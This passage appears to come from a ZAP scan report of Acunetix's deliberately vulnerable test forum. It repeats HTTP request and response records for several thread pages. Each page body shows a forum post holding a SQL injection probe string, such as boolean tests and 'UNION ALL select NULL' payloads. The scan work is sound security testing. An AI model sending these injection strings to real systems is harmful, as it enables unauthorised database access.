are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4149 |
| Response Body - size: 4,149 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
